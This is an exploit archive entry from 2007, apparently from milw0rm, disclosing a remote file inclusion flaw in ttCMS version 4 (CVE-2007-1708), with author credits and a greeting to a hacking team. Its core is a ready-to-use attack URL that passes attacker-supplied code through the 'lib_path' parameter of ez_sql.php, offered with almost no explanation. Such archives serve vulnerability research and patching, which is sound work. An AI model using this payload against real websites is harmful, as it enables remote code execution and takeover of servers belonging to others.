ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion
Author: Kacper
type: webapps
platform: php
port:
date_added: 2007-03-23
date_updated:
verified: 1
codes: OSVDB-37198;CVE-2007-1708
tags:
aliases:
screenshot_url:
application_url:
DEVIL TEAM - HACKING POLISH TEAM
Author: Kacper (a.k.a Rahim)
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.
ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/
--------------------------------------------
Vulnerabilities:
http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]
# milw0rm.com [2007-03-24]